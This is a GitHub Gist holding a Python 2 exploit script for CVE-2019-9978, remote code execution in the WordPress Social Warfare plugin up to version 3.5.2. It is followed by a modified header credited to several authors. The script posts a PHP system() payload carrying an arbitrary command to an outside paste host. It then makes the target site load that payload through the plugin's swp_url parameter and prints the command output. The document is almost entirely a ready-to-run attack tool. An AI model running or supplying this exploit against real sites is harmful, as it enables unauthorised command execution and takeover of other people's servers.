Created
May 12, 2019 07:21
-
-
Save budanthara/add0636a478d00ebc95fb7a5b4fe35b0 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
| # Date: March, 2019 | |
| # Researcher: Luka Sikic | |
| # Exploit Author: hash3liZer | |
| # Download Link: https://wordpress.org/plugins/social-warfare/ | |
| # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
| # Github: https://github.com/hash3liZer/CVE-2019-9978 | |
| # Version: <=3D 3.5.2 | |
| # CVE: CVE-2019-9978 | |
| # Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 ) | |
| # Date: March, 2019 | |
| # Researcher: Luka Sikic | |
| # Exploit Author: hash3liZer | |
| # Download Link: https://wordpress.org/plugins/social-warfare/ | |
| # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
| # Github: https://github.com/hash3liZer/CVE-2019-9978 | |
| # Version: <= 3.5.2 | |
| # CVE: CVE-2019-9978 | |
| # Modified by: snoww0lf | |
| import sys | |
| import requests | |
| import re | |
| import urlparse | |
| import optparse | |
| class EXPLOIT: | |
| VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s" | |
| def __init__(self, _t, _c): | |
| self.target = _t | |
| self.command = _c | |
| def payload_url(self): | |
| url = "https://clbin.com/" | |
| data = {'clbin': "<pre>system('" + self.command + "')</pre>"} | |
| r = requests.post(url, data=data) | |
| return r.text.strip() | |
| def engage(self): | |
| uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload_url() ) | |
| r = requests.get( uri ) | |
| if r.status_code == 200: | |
| print "[*] Received Response From Server!" | |
| rr = r.text | |
| obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" )) | |
| if obj: | |
| resp = obj.groups()[0] | |
| if resp: | |
| print "[<] Received: " | |
| print resp.replace( "lnbreak", "\n" ) | |
| else: | |
| sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") | |
| else: | |
| sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") | |
| else: | |
| sys.exit( "[~] Unexpected Status Received!" ) | |
| def main(): | |
| parser = optparse.OptionParser( ) | |
| parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" ) | |
| parser.add_option( '-c' , '--command', dest="command", default="", type="string", help="Enter linux command" ) | |
| (options, args) = parser.parse_args() | |
| print "[>] Sending Payload to System!" | |
| exploit = EXPLOIT( options.target, options.command ) | |
| exploit.engage() | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment